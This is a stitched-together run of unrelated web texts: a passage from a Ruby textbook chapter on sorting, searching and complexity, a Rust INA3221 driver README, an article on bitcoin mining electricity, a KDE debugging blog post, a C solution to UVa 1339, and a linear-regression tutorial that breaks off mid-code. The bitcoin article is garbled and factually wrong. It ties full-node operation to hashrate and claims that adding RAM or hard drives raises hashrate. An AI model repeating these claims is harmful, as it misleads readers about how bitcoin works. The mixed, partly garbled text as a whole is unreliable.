37 for j in 0..NUM_STUDENTS - 1
38 num = arr[j]
39 digit = num[max_length - 1 - i]
40 buckets[digit].push(num)
41 end
42 # Flatten the buckets into a one-dimensional array
43 arr = buckets.values.flatten
44 end
45
46 # Now output the sorted array
47 puts "Sorted array:"
48 for i in (0..NUM_STUDENTS - 1)
49 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
50 end
§ Lines 2–9 initialize the list to be sorted as we have described in all the other sorts. Notice that we are storing the numbers as strings, rather than integers, so we can easily access the individual digits of the number. The list is initialized with random values.
§ One addition is a loop, on lines 23–25, that right-justifies the array elements in the list using the Ruby rjust function. This pads the numbers in the list with leading zeros.
Since we are going to loop through the entries in the list digit by digit, it is crucial that all numbers contain the same number of digits. Padding with zeros in the front of the number is the best way to ensure that all numbers are of the same length.
§ Lines 29–44 contain the outer loop that processes the list one digit at a time. For each digit, the entire list will be traversed.
§ On lines 31–34, we reset the hash named buckets that we discussed in the description of the algorithm.
§ Lines 37–41 are the inner loop that adds each number to its corresponding bucket.
§ Line 43 uses two functions, values and flatten, to give a new array representing the values sorted according to the current digit we are processing. The values function returns an array of all the values in a hash, which is analogous to the keys function discussed in Section 6.3, “Hashes.” The flatten function takes a two-dimensional array and returns a one-dimensional array with the same elements, as shown in the following irb session:
irb(main):001:0> arr = [[1, 2], [3, 4], [5, 6]]
=> [[1, 2], [3, 4], [5, 6]]
irb(main):002:0> arr.flatten
=> [1, 2, 3, 4, 5, 6]
7.2 Complexity Analysis
To evaluate an algorithm, a common approach is to analyze its complexity. That is, we essentially count the number of steps involved in executing the algorithm.
An intuitive explanation of complexity analysis is the following. We caution you that our explanation is clearly an oversimplification, but it suffices for our purposes. Given a certain input size, assuming that to process a single element takes one unit of time, how many units of time are involved in processing n elements of input? This is essentially what complexity analysis attempts to answer. As can be seen, it is unnecessary to determine exactly the computer time involved in each step; instead, we simply determine the number of logical steps that occur in a given algorithm. In reality, we can have families of steps (say, one family is addition and subtraction, the other multiplication and division). We then count how many steps of each family are required.
A simple example will be to evaluate the complexity of computing a² + ab + b² for a large number, say, n, of pairs of a and b. Computing directly, we should have 3n multiplications and 2n additions. However, we can compute the same expression using (a + b)² – ab, which can be done in 2n multiplications and 2n additions (note that we consider addition and subtraction to be in the same family of steps). Thus, the second expression is better than the original. For very large values of n, this may make a significant difference in computation time. This is a very simple example, but it provides a background for our discussions of the complexity of sorting algorithms.
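A quick check of the algebra (our own snippet): (a + b)² - ab expands to a² + 2ab + b² - ab = a² + ab + b², so the two forms must agree for any pair:

```ruby
# Compare the direct form (3 multiplications) with the rewritten
# form (2 multiplications) on random pairs; they must always match.
100.times do
  a, b = rand(1000), rand(1000)
  direct = a * a + a * b + b * b       # a^2 + ab + b^2
  clever = (a + b) * (a + b) - a * b   # (a + b)^2 - ab
  raise "mismatch for a=#{a}, b=#{b}" unless direct == clever
end
puts "Both forms agree on 100 random pairs."
```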
In complexity analysis, we forgo constants; thus, the distinction between n and n – 1 is nonexistent in terms of complexity. Moreover, we often assume that all computations belong to the same family of operations. In terms of our complexity analysis, it does not matter whether the list shrinks or grows; for simplicity, assume it shrinks.
Now consider the three presented comparison-based sorting algorithms. For all, the outer loop has n steps, and for the inner loop the size of the list shrinks by one with each pass. So the first time it takes n steps, the next time n – 1, the next time n – 2, and so on. Thus, the number of steps is:
n + (n – 1) + (n – 2) + ... + 3 + 2 = 2 + 3 + ... + (n – 2) + (n – 1) + n
If you add 1 to the rewriting of the sum, it becomes the well-known arithmetic series 1 + 2 + ... + n, whose total is n(n + 1)/2. So the total number of steps for these sorts is n(n + 1)/2 – 1.
Clearly, for any n > 0, n(n + 1)/2 – 1 is less than n²; however, the complexity is still considered roughly n². The official notation is O(n²) and is pronounced “on the order of” or “big oh.” The reason the complexity is O(n²) is because complexity is only an approximation, and clearly the dominant portion of n(n + 1)/2 – 1 is n². For our purposes, if you grasp the concept of the dominant portion to determine complexity, you are ahead of the game.
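You can confirm the step count numerically. The sketch below (ours, not from the chapter) sums the comparison series n + (n – 1) + ... + 2 directly and checks it against the closed form n(n + 1)/2 – 1:

```ruby
# Sum the comparison series 2 + 3 + ... + n and compare it with the
# closed-form total n(n + 1)/2 - 1 for several list sizes.
def comparison_count(n)
  (2..n).sum
end

[5, 35, 1000].each do |n|
  closed_form = n * (n + 1) / 2 - 1
  raise "mismatch at n=#{n}" unless comparison_count(n) == closed_form
end
puts "Series total matches n(n + 1)/2 - 1."
```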
In complexity analyses, cn², where c is a constant, is considered O(n²) for any finite c. For actual computations, however, the value of c may be important. Again, refer to a book on complexity theory to understand, in detail, this important concept. For a reading list on algorithms and complexity, see Appendix A.
As an aside, order computation typically involves best-, average-, and worst-case analyses. For the selection and bubble sort algorithms presented, the best-, average-, and worst-case analyses are the same, since regardless of the initial ordering of the list, the processing is identical. As previously mentioned, there is an implementation of bubble sort that checks for no swapping with potential early termination. In such a case, the best-case analysis, which occurs when the initial list is already sorted, is O(n).
Now let’s turn to insertion sort, which is somewhat trickier to analyze. Here we are finding the rightmost element at which point to insert the value. For an already sorted list, the rightmost element will occur immediately, and we will end up at only n steps! Thus, the best-case analysis for insertion sort is O(n). However, if the list is precisely the opposite of sorted, namely, in descending order, we must process until the end of the list for each step. Thus, once again, we end up with n(n + 1)/2 – 1 steps, and the worst-case analysis for insertion sort is O(n²). It turns out that the average-case analysis is likewise O(n²).
The radix sort works in O(d · n), where d is the number of digits that must be processed and n is the number of entries that are to be sorted. Hence, it should run much faster than the other examples. It should be noted that other algorithms—quicksort, mergesort, and heapsort—all run in O(n log(n)) time. The radix sort might at first appear to be faster than these, but it depends on how many digits are processed. A 64-bit integer might require processing each bit as a digit. Hence, the runtime where d = 64 will be O(64n). This might sound good, but n log(n) time will be faster where n < 2⁶⁴. So, in comparing the three sorts as presented, the average- and worst-case analyses for the comparison-based sorts are O(n²), while the radix sort can vary from linear time (sorting values with a single bit) to an unbounded amount of time, as the number of digits is theoretically not constrained.
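The 64-digit crossover is quick to check with arithmetic (a back-of-the-envelope sketch of ours): radix at d = 64 costs about 64n, while a comparison sort costs about n log2(n), so radix wins only once log2(n) exceeds 64:

```ruby
# Compare the rough costs 64*n (radix, d = 64) and n*log2(n)
# (comparison sort) for several powers of two.
d = 64
[2**10, 2**20, 2**70].each do |n|
  radix_cost = d * n
  nlogn_cost = n * Math.log2(n)
  winner = radix_cost < nlogn_cost ? "radix" : "n log n"
  puts "n = 2**#{Math.log2(n).round}: #{winner} is cheaper"
end
```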
7.3 Searching
Searching a list of names or numbers is another very common computer science task. There are many search algorithms, but the key in developing a search algorithm is to determine which type of candidate search process matches the particular need. The following are the two questions (parameters) that affect our search algorithm selection:
§ Is the list we are searching sorted or unsorted?
§ Are the searched list elements unique, or are there duplicate values within the list?
For simplicity, we illustrate the search process using only a unique element list. That is, our implementation assumes that there are no duplicate values. We then discuss what needs to be modified in the algorithm and corresponding Ruby implementation to support duplicate values. Given the level of programming sophistication you now possess, we forgo presenting the only slightly modified implementation that supports duplicate values and leave it as an exercise for you. Once again, we revisit the final exam grade example we used in the sections on sorting.
We now discuss two types of searches. The first is for an unsorted list called a linear search, and the second is for an ordered or sorted list; it is called a binary search.
7.3.1 Linear Search
Consider the problem of finding a number or a name, or more accurately, its position, in an unsorted list of unique elements. The simplest means to accomplish this is to visit each element in the list and check whether the element in the list matches the sought-after value. This is called a linear or sequential search since, in the worst case, the entire list must be searched in a linear fashion (one item after another). This occurs when the sought-after value either is in the last position or is absent from the list. Obviously, the average case requires searching half the list since the sought-after value can be found equally likely anywhere in the list, and the best case occurs when the sought-after value is the first element in the list. The algorithm is as follows:
1. For every element in the list, check whether the element is equal to the value to be found.
2. If the element looked for is found, then the position where the element is found is returned. Otherwise, continue to the next element in the list.
Continue the search until either the element looked for is found or the end of the list is reached.
A Ruby implementation for unique element linear search is provided in Example 7-5.
Example 7-5. Code for linear search
1 # Code for linear search
2 NUM_STUDENTS = 35
3 MAX_GRADE = 100
4 arr = Array.new(NUM_STUDENTS)
5 value_to_find = 8
6 i = 1
7 found = false
8
9 # Randomly put some student grades into arr
10 for i in (0..NUM_STUDENTS - 1)
11 arr[i] = rand(MAX_GRADE + 1)
12 end
13
14 puts "Input List:"
15 for i in (0..NUM_STUDENTS - 1)
16 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
17 end
18 i = 0
19 # Loop over the list until it ends or we have found our value
20 while ((i < NUM_STUDENTS) and (not found))
21 # We found it :)
22 if (arr[i] == value_to_find)
23 puts "Found " + value_to_find.to_s + " at position " + i.to_s + " of the list."
24 found = true
25 end
26 i = i + 1
27 end
28
29 # If we haven't found the value at this point, it doesn't exist in our list
30 if (not found)
31 puts "There is no " + value_to_find.to_s + " in the list."
32 end
Consider now the case of an unsorted list with potentially duplicate elements. In this case, it is necessary to check each and every element in the list, since an element matching the sought-after value does not imply completion of the search process. Thus, the only difference between this algorithm and the unique element linear search algorithm is that we continue through the entire list without terminating the loop if a matching element is found.
§ In line 5, we initialize the sought-after value. Clearly the user would be prompted with some nice box to fill in, but we do not want to get distracted with user-interface issues. Ultimately the user fills in the nice box, pulls down a value list, or clicks on a radio button, and a variable such as value_to_find will be initialized.
§ Next, a flag called found is set to false on line 7. This is used so that the search will terminate when the sought-after value is indeed found.
§ In lines 10–12, the list is initialized and filled with some random values.
§ The key loop starts at line 20, where the list is traversed one item at a time. Each time, the comparison in line 22 tests to determine if the element in the array matches the sought-after value the user is trying to find. If the value matches, a message is displayed, the flag is set to true, and the loop terminates.
§ Finally, on line 30, a check is made to determine if the element was not found—in other words, is absent from the list. If this is the case, the value in the found flag will remain false. If it is still false after traversing the entire list, this means that no value in the list matched the sought-after value, and the user is notified.
7.3.2 Binary Search
Binary search operates on an ordered set of numbers. The idea is to search the list precisely the way you might ideally search a phone book. A phone book is ordered from A to Z. Ideally, you initially search the halfway point in the phone book. For example, if the phone book had 99 names, ideally you would initially look at name number 50. Let’s say it starts with an M, since M is the 13th letter in the alphabet. If the name we are looking for starts with anything from A to M, for example, “Fred,” we find the halfway point between those beginning with A and those beginning with M. If, on the other hand, we are searching for a name farther down the alphabet than those names that start with M, for example, “Sam,” we find the halfway point between those beginning with M and those beginning with Z. Each time, we find the precise middle element of those elements left to be searched and repeat the process. We terminate the process once the sought-after value is found or when the remaining list of elements to search consists of only one value.
By following this process, each time we compare, we eliminate half of the remaining search space. This halving process results in a tremendous savings in terms of the number of comparisons made. A linear search must compare each element in the list; a binary search cuts the search space in half each time. Thus, 2^x = n is the equation needed to determine how many comparisons (x) are needed to find a sought-after value in an n element list. Solving for x, we obtain x = log2(n).
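The relationship 2^x = n is easy to observe empirically. The sketch below (our own helper, not from the chapter’s listings) counts probes while binary-searching a sorted array of 2**20 elements; the count comes out to log2(n), give or take one:

```ruby
# Binary search that counts its probes; returns [position, probes],
# or [nil, probes] if the target is absent.
def binary_search_probes(arr, target)
  low, high, probes = 0, arr.length - 1, 0
  while low <= high
    probes += 1
    mid = (low + high) / 2
    return [mid, probes] if arr[mid] == target
    if arr[mid] < target
      low = mid + 1
    else
      high = mid - 1
    end
  end
  [nil, probes]
end

n = 2**20  # 1,048,576 elements
arr = (0...n).to_a
_, probes = binary_search_probes(arr, n - 1)
puts "Probes to find the last element: #{probes} (log2(n) = #{Math.log2(n).to_i})"
```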
GEM OF WISDOM
Binary search is one of the finest examples of computer science helping to make software work smart instead of just working hard. A linear search of 1 million elements takes on average half a million comparisons. A binary search takes 20. That is an average savings of 499,980 comparisons! So think before you code.
Instead of an O(n) algorithm needed to find an element using a linear search, we now have an O(log2(n)) search algorithm. Now, for example, consider a sorted list with 1,048,576 elements. For a linear search, on average, we would need to compare 524,288 elements against the sought-after value, but we may need to perform a total of 1,048,576 comparisons.
In contrast, in a binary search we are guaranteed to search using only log2(1,048,576) = 20 comparisons. Instead of 524,288 comparisons in the average case, the binary search algorithm requires only 20. That is, the number of comparisons required by the binary search algorithm is less than 0.004% of the expected number of comparisons needed by the linear search algorithm. As an aside, O(log2(n)) and O(log(n)) are equivalent, since they differ strictly by a constant. Hence, generally speaking, the O(log(n)) notation is preferred. Of course, binary search is possible only if the original list is sorted. The binary search explanation given earlier is for a unique element list only. However, before presenting the modification needed for potential duplicate elements, a few remarks regarding the use of binary search must be made:
§ First, binary search assumes an ordered list. If the list is unordered, it must be sorted prior to the search, or a binary search won’t work. Sorting involves a greater time complexity than searching. Thus, if the search will occur rarely, it might not be wise to sort the list. On the other hand, searches often occur frequently and the updating of the list occurs infrequently. Thus, in such cases, always sort (order) the list and then use binary search.
§ The average- and worst-case search times for binary search are O(log(n)), while the average- and worst-case search times for linear search are O(n). What is interesting, however, is that unlike for linear search, where, in practice, the worst-case search time is double that of the average case, for binary search both times are roughly identical in practice.
In Example 7-6, we present a Ruby implementation of unique element binary search. Note that we introduce on line 16 a built-in Ruby feature to check if a value is already present within an array and on line 22 to sort an array in place.
Example 7-6. Code for binary search
1 # Code for binary search
2 NUM_STUDENTS = 30
3 MAX_GRADE = 100
4 arr = Array.new(NUM_STUDENTS)
5 # The value we are looking for
6 value_to_find = 7
7 low = 0
8 high = NUM_STUDENTS - 1
9 middle = (low + high) / 2
10 found = false
11
12 # Randomly put some exam grades into the array
13 for i in (0..NUM_STUDENTS - 1)
14 new_value = rand(MAX_GRADE + 1)
15 # make sure the new value is unique
16 while (arr.include?(new_value))
17 new_value = rand(MAX_GRADE + 1)
18 end
19 arr[i] = new_value
20 end
21 # Sort the array (with Ruby's built-in sort)
22 arr.sort!
23
24 print "Input List: "
25 for i in (0..NUM_STUDENTS - 1)
26 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
27 end
28
29 while ((low <= high) and (not found))
30 middle = (low + high) / 2
31 # We found it :)
32 if arr[middle] == value_to_find
33 puts "Found grade " + value_to_find.to_s + "% at position " + middle.to_s
34 found = true
35 end
36
37 # If the value should be lower than middle, search the lower half,
38 # otherwise, search the upper half
39 if (arr[middle] < value_to_find)
40 low = middle + 1
41 else
42 high = middle - 1
43 end
44 end
45
46 if (not found)
47 puts "There is no grade of " + value_to_find.to_s + "% in the list."
48 end
We use these features to simplify the code illustrated. Note that this type of abstraction, namely, the use of the built-in encapsulated feature, simplifies software development, increases readability, and simplifies software maintenance. Its use is paramount in practice. It should be understood that this book uses Ruby as a tool for learning concepts of computer science and basic programming, and not as an attempt to teach all the capabilities of the Ruby interpreter. See the additional reading list in Appendix A if you are interested in exploring additional built-in features of Ruby.
§ Line 9 computes the initial middle position of the range.
§ Lines 29–44 implement the key loop that keeps cutting the search space down by half.
§ Line 32 is the comparison to the sought-after value. If we find the element, we are done and we update the same found flag that was used for the linear search. If the value is less than the middle we update the high side of the range, and if it is greater we update the low side of the range. At the end, we verify that the sought-after value was indeed found.
As with the linear search algorithm, the modification required to support possible duplicate values is relatively minimal for the binary search algorithm. Since binary search requires an ordered list, if a sought-after value is found, then all duplicates must be adjacent to the position just found.
Thus, to find all duplicates, positions immediately preceding and following the current position are checked for as long as the sought-after value is found. That is, in succession, adjacent positions earlier and earlier in the list are checked while the stored element value equals that which is sought after, and similarly for later and later positions. Again, the implementation of this change is left as an exercise to the reader.
7.4 Summary
We discussed the various sorting schemes, both comparison-based and non-comparison-based, and the strengths of each. We introduced the field of complexity analysis, a tool used to quantify the performance of an algorithm. Finally, we discussed searching and provided a real-world example of searching techniques.
Specifically, we described four elementary sorting algorithms. The first three presented—selection, insertion, and bubble sort—are comparison based. That is, elements are compared against one another to determine a sorted ordering. The fourth algorithm, radix sort, differs substantially. Instead of comparing elements, radix sort orders the elements according to their representation, starting from the rightmost digit. Once all digits of the element representation are processed, the list is sorted. The complexity of these sorting algorithms is presented in Table 7-1, where n represents the number of elements in the list and k represents the number of digits needed to represent the largest element. The best-case scenario occurs when the original list is already sorted; the worst-case scenario occurs when the original list is in reverse order; and the average-case scenario represents an original random ordering.
Table 7-1. Sort algorithm complexity summary
                 Best case    Worst case    Average case
Selection sort   O(n²)        O(n²)         O(n²)
Insertion sort   O(n)         O(n²)         O(n²)
Bubble sort      O(n)         O(n²)         O(n²)
Radix sort       O(kn)        O(kn)         O(kn)
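The digit-by-digit behavior of radix sort summarized above can be sketched as follows (my own illustrative Python, not the chapter's Example 7-4; it makes one bucket pass per decimal digit of the largest element):

```python
def radix_sort(nums):
    """LSD radix sort for non-negative integers, one decimal digit per pass."""
    if not nums:
        return nums
    digits = len(str(max(nums)))           # k: digits in the largest element
    for place in range(digits):
        buckets = [[] for _ in range(10)]  # one bucket per decimal digit
        for n in nums:
            buckets[(n // 10 ** place) % 10].append(n)
        # Concatenate buckets in order; order from earlier passes is preserved
        nums = [n for bucket in buckets for n in bucket]
    return nums
```

Each of the k passes touches all n elements once, giving the O(kn) running time discussed above.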
Likewise, we presented two searching algorithms: linear and binary search. Linear search can be used to search any list, whereas binary search requires a sorted list. The complexity of these searching algorithms is presented in Table 7-2, where n represents the number of elements in the list searched. The best-case scenario occurs when the first element encountered is the element sought; the worst-case scenario occurs when the sought-after element is missing; and the average-case scenario represents a random list.
Table 7-2. Search algorithm complexity summary
                Best case    Worst case    Average case
Linear search   O(1)         O(n)          O(n)
Binary search   O(1)         O(log n)      O(log n)
7.4.1 Key Concepts
§ Sorting is a common problem that occurs in many places in computer science. We focus primarily on comparison-based sorting, where we simply compare the items to determine the order. Radix sort sorts numbers without directly comparing them.
§ Searching can be done naively by linearly searching through a list, but if the list is sorted, we can take advantage of binary search to improve performance.
§ When discussing algorithm performance, computer scientists use complexity analysis.
7.4.2 Key Definitions
§ Comparison-based sort: A sorting method that relies on directly comparing the elements.
§ Complexity analysis: A mathematical way of analyzing an algorithm’s performance.
7.5 Exercises
1. Radix sort, as presented, works for integers. Modify the algorithm in Example 7-4 to sort English names.
2. For each input sequence provided in the following list, state which presented comparison-based sort or sorts would require the fewest steps. Explain why.
a. 5 2 4 3 1
b. 1 2 3 4 5
c. 5 4 3 2 1
3. You are provided a lengthy unsorted list and told to search it.
a. Which search algorithm would you use?
b. If you were told that you will need to search the list many times, would your search strategy change? If so, how?
c. At which point would you change your approach if you were to change it?
4. The complexity of the comparison-based sorting algorithms presented, on the average case, is O(n²). Design a comparison-based sorting algorithm with a lower complexity. What is the underlying premise that lowers its complexity?
5. Generate a 100-element list containing integers in the range 0–10. Sort the list with selection sort and with radix sort.
a. Which is faster? Why?
b. Try this again, but with 10,000 elements. Note the relative difference. Why does it exist?
10 unstable releases (3 breaking)
0.4.5 Feb 20, 2023
0.4.4 Feb 3, 2023
0.3.0 Feb 1, 2023
0.2.1 Feb 1, 2023
0.1.0 Feb 1, 2023
#929 in Embedded development
47 downloads per month
MIT license
29KB
314 lines
ina3221
crates.io
Embedded driver for the INA3221 triple-channel power monitor in Rust.
The INA3221 is very similar to the classic INA219 power monitor IC.
Compatibility
Any board that supports embedded-hal blocking 1.0 I2c should be compatible with this library.
NOTE: Some HALs require feature flagging to enable 1.0 functionality, for example esp-hal requires the eh1 feature.
Installation
You can add via crates.io:
$ cargo add ina3221
Documentation
You can find the documentation here.
Example
This example assumes a 0.1 Ohm shunt resistor for current and power calculations.
const INA3221_I2C_ADDR: u8 = 0x40;
const SHUNT_RESISTANCE: f32 = 0.1f32; // 0.1 Ohm
use ina3221::INA3221;
fn main() {
let i2c = I2C::new(/* initialize your I2C here */);
let ina = INA3221::new(i2c, INA3221_I2C_ADDR);
let mut delay = Delay::new(/* initialize your delay/clocks */);
loop {
for channel in 0..3 {
let shunt_voltage = ina.get_shunt_voltage(channel).unwrap();
let bus_voltage = ina.get_bus_voltage(channel).unwrap();
// Voltage can be added using the '+' operator on the unit type
let load_voltage = bus_voltage + shunt_voltage;
// Skip channel if no voltage present
if shunt_voltage.is_zero() {
continue;
}
// Use Ohm's Law to calculate current and power with known resistance
let current_milliamps = shunt_voltage.milli_volts() / SHUNT_RESISTANCE;
let power_milliwatts = current_milliamps * load_voltage.volts();
println!(
"Channel {}: load = {:.3} V, current = {:.3} mA, power = {:.3} mW",
channel + 1,
load_voltage.volts(),
current_milliamps,
power_milliwatts,
);
}
delay.delay_ms(1000u32);
}
}
Output
This is sample output powering an Arduino Uno R3 over USB, running the blinky script.
Channel 1: load = 5.212 V, current = 36.800 mA, power = 191.790 mW
Channel 1: load = 5.211 V, current = 33.600 mA, power = 175.102 mW
Channel 1: load = 5.212 V, current = 36.800 mA, power = 191.790 mW
Channel 1: load = 5.219 V, current = 34.000 mA, power = 177.460 mW
Channel 1: load = 5.212 V, current = 36.800 mA, power = 191.790 mW
Channel 1: load = 5.211 V, current = 34.000 mA, power = 177.188 mW
Channel 1: load = 5.211 V, current = 34.000 mA, power = 177.188 mW
Channel 1: load = 5.212 V, current = 36.400 mA, power = 189.704 mW
Channel 1: load = 5.211 V, current = 34.000 mA, power = 177.188 mW
Channel 1: load = 5.212 V, current = 36.800 mA, power = 191.790 mW
Channel 1: load = 5.211 V, current = 34.000 mA, power = 177.188 mW
Dependencies
~215KB
What Is the Main Purpose of Bitcoin?
Lately I took a look at why bitcoin mining uses so much electricity. It's due to the number of computers that are participating in the network. The more computers there are, the more the speed of the network increases. This means that more work has to be done in order to secure the network and guard against things like denial-of-service attacks.
What Sort of Work Goes into Securing the Network?
So what sort of work goes into securing the network? There are two major components to consider here. The first component is the hashrate. The higher the hashrate, the more work must go into securing the network, since fewer servers will take the task away from the individual doing the securing. Because of this, the people with the most hashrate will be taking care of the security.
One more factor to consider here is memory speed. This is essential, since your transaction data are not going to need to travel across many different computers before they are recorded. The more memory the computer has, the faster the data can be stored and moved. Consequently, if you have a high hashrate but very low memory, you are going to be consuming much less energy than you would with a lower hashrate and a lot of memory.
Why Does Bitcoin Mining Use So Much Electricity?
These are two major factors to weigh when considering why bitcoin mining uses so much electricity. One reason is that in order to make money from mining, you need to have a lot of computing power. At this time, there are not very many computers out there that have a high enough hashrate to make money. As a result, unless there is a solution that can increase the hashrate sufficiently, you are not likely to be able to make any money from this kind of business until the technology exists. Even then, it will not be anytime soon.
Another reason this occurs is that power is normally a scarce resource. The dilemma is that there is a limited quantity of power available for people to use. Solar power and wind power are great examples of alternative sources of electricity that are economical to use and reliable. They enable us to create our own power using the energy we have available.
To sum this up, the biggest reason bitcoin mining uses so much electricity is that there are no large-scale solutions in place yet to reduce the hashrate necessary to run a full node. We may eventually see this type of solution, but for the time being, we are limited by the current hashrate we can use. To raise the hashrate, we would need to move to a bigger computer that has multiple hard drives or purchase more RAM. These are just a few reasons why the hashrate constraints exist, and they won't change in the near future.
Monthly Archives: June 2011
How can I be a KDE power user?
As far as I can tell, KDE is essentially a desktop environment shell layered on top of many very useful libraries. The difficulty is, how does one test each individual layer?
Here’s a recent example. I started by using Amarok as my music player, a default choice it seems for many KDE users. I put an audio CD in the drive, and it appeared in Amarok. When I tried to play or rip the CD, though, the interface just wouldn’t respond.
Fast-forward many, many hours later, and I've traced the issue through logs spit out by Amarok, Phonon, Kscd, gstreamer, ffmpeg, and the kernel itself, and I've narrowed the issue down to the KDE I/O layer. cdparanoia reads disks just fine. No KDE-based app can. There are a lot of seek errors in the kernel logs, which appear only when a KDE-based app is up and running with a CD in the drive.
So what’s the big deal, you might ask? I figured it out. What’s the problem?
Perhaps I’m spoiled, but in GNOME I debugged issues quite differently. If I had an issue, I’d go through each API layer, and use each one’s executables. Note the difference between KDE and GNOME: GNOME makes every layer, every setting easy to access, if you look for it. KDE gives you everything at once, and hides everything else in a wall of libraries. There’s no intermediate executables I can use to debug each layer, by manually running through steps myself. There’s no ability to get a work-around, or to helpfully narrow down the area where the bug exists for Google searching.
How do I make my debugging with KDE more productive? What steps do I take? How have you debugged KDE-based applications? I know about the KDE wiki page, but is there anything else?
UVa 1339 Ancient Cipher
Views: 161 Published: 2017-12-24 Category: c
Ancient Cipher
Time Limit: Unknown Memory Limit: Unknown
Total Submission(s): Unknown Accepted Submission(s): Unknown
https://uva.onlinejudge.org/i...
Accepted Code
#include "stdio.h"
#include "string.h"
#define MAX 110
void count(char str[], int cnt[]);
int main()
{
char str1[MAX], str2[MAX];
while (scanf("%s%s", str1, str2) != EOF)
{
int cnt1[26] = { 0 }, cnt2[26] = { 0 };
count(str1, cnt1); count(str2, cnt2);
for (int i = 1; i < 26; i++) {
for (int k = 0; k < 26 - 1; k++) {
if (cnt1[k] > cnt1[k + 1]) {
int tmp = cnt1[k];
cnt1[k] = cnt1[k + 1];
cnt1[k + 1] = tmp;
}
if (cnt2[k] > cnt2[k + 1]) {
int tmp = cnt2[k];
cnt2[k] = cnt2[k + 1];
cnt2[k + 1] = tmp;
}
}
}
int flag = 1;
for (int i = 1; i < 26; i++) {
if (cnt1[i] != cnt2[i]) {
flag = 0;
break;
}
}
if (flag)
printf("YES\n");
else
printf("NO\n");
}
return 0;
}
void count(char str[], int cnt[])
{
for (int i = 0; str[i] != '\0'; i++)
cnt[str[i] - 'A']++;
}
Notes
Problem:
Given two strings, one of them may be transformed by "rearranging the letter order" and applying a "one-to-one mapping" (or left unchanged). Determine whether the two strings can be made identical after such operations.
Analysis:
Since the letters can be rearranged, the position of each letter does not matter; what matters is how many times each letter appears.
So we can first count the occurrences of each letter in the two strings, obtaining two arrays cnt1[26] and cnt2[26].
The next step takes a little imagination: as long as the two arrays are identical after sorting, the two input strings can be made identical through rearrangement and a one-to-one mapping.
Thus, the core of the problem is sorting.
//-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
//
//   Author: 龙威昊
//   Completed: 2017/12/22
//
//-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
What Is Linear Regression?
Linear regression is a method to predict the value of an outcome variable (Y) depending on one or more input predictor variables (X). The objective of linear regression is to model a continuous variable (Y) as a mathematical function of one or more variable(s) (X), in order to use this regression model to predict Y when only X is known.
This mathematical equation can be generalized as follows:
Y = β1 + β2X + ϵ
where, β1 is the intercept and β2 is the slope. Collectively, they are called regression coefficients. ϵ is the error term, the part of Y the regression model is unable to explain.
Simple Linear Regression
In Simple Linear Regression, there is only one predictor variable (X). The predictions of Y when plotted as a function of X form a straight line.
A Simple Example
Let us take a simple example to understand the concept of regression. Consider the following data –
X Y
1 4
3 5
4 3
2 2
5 5
If we plot the above data, we get the following:
In Linear Regression, we try to find the best-fitting straight line through the points. The best-fitting line is called a regression line.
In the above plot, the black line is the regression line. The most frequently used criterion for the best fitting line is the line which minimizes the sum of the squared errors of prediction. The error of prediction for a point is the value of the point minus the predicted value. The predicted value is simply the value on the regression line.
For example, for the point where x=3, y=5, the predicted value is 3.8, that is, the point on the line corresponding to x=3 is 3.8, but the actual y value is 5. So, the error of prediction is 1.2.
The regression line minimizes the sum of the squared errors of prediction over all the points (equivalently, the root mean square error). The mean square error (MSE) is the mean of the squared errors of prediction of all the points, and the root mean square error (RMSE) is the square root of the MSE. In the above example, the MSE is 1.18 and the RMSE is about 1.086.
To compute the regression line, a few concepts of statistics are used. Let MX be the mean of X, MY be the mean of Y, sX be the standard deviation of X, sY be the standard deviation of Y, and r be the correlation between X and Y.
The slope of the regression line is calculated as –
b = r*(sY/sX)
And the intercept of the regression line is calculated as –
A = MY – b*(MX)
Nowadays there are many statistical software packages that help to compute the regression line.
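Putting the formulas above into code (my own illustrative sketch; since b = r*(sY/sX) algebraically reduces to the sum of (xi − MX)(yi − MY) divided by the sum of (xi − MX)², the code uses the latter form):

```python
def fit_line(xs, ys):
    """Intercept A and slope b from the formulas in the text:
    b = r*(sY/sX), equivalently cov(X, Y) / var(X); A = MY - b*MX."""
    n = len(xs)
    mx = sum(xs) / n
    my = sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    var_x = sum((x - mx) ** 2 for x in xs)
    b = cov / var_x        # slope
    a = my - b * mx        # intercept
    return a, b

def rmse(xs, ys, a, b):
    """Root of the mean squared error of prediction over all points."""
    n = len(xs)
    mse = sum((y - (a + b * x)) ** 2 for x, y in zip(xs, ys)) / n
    return mse ** 0.5
```

For the small five-point example earlier, this gives a slope of 0.3 and an intercept of 2.9.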
Correlation
Correlation is a statistical measure that suggests the level of linear dependence between two variables. Correlation can take values between -1 to +1. A value of correlation closer to 1 or -1 suggests a strong relationship between the variables. Whereas the value of correlation closer to 0 indicates a weak relationship between the variables. A low correlation (-0.2 < x < 0.2) usually suggests that most of the variation of the response variable (Y) is not explained by the predictor (X).
Statistical Significance
We assess our linear regression model's statistical significance by looking at the p-value and t-value. Usually, we consider a linear model statistically significant when these p-values are less than a pre-determined significance level, typically 0.05.
Every p-value has a null and an alternative hypothesis associated with it, which help to analyze the model. In linear regression, the null hypothesis is that the coefficients associated with the variables are equal to zero. The alternative hypothesis is that the coefficients are not equal to zero (i.e., there exists a relationship between the independent variable in question and the dependent variable).
A larger t-value implies that it is less likely that the coefficient differs from zero purely by chance. So, the higher the t-value, the better. Pr(>|t|) or the p-value is the probability of getting a t-value as high as or higher than the observed value when the null hypothesis (that the β coefficient is zero, i.e., there is no relationship) is true. So, if Pr(>|t|) is low, the coefficient is significant (significantly different from zero). If Pr(>|t|) is high, the coefficient is not significant.
When p-value is less than the significance level (< 0.05), we can safely reject the null hypothesis that the coefficient β of the predictor is zero.
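As a sketch of where the slope's t-value comes from, the standard OLS formulas can be computed by hand (an illustrative sketch with my own function name; the article itself does not spell these formulas out):

```python
def slope_t_value(xs, ys):
    """t statistic for the slope: t = b / SE(b), where
    SE(b) = s / sqrt(sum((x - mean_x)^2)) and s^2 = SSE / (n - 2)."""
    n = len(xs)
    mx = sum(xs) / n
    my = sum(ys) / n
    sxx = sum((x - mx) ** 2 for x in xs)
    b = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / sxx
    a = my - b * mx
    sse = sum((y - (a + b * x)) ** 2 for x, y in zip(xs, ys))
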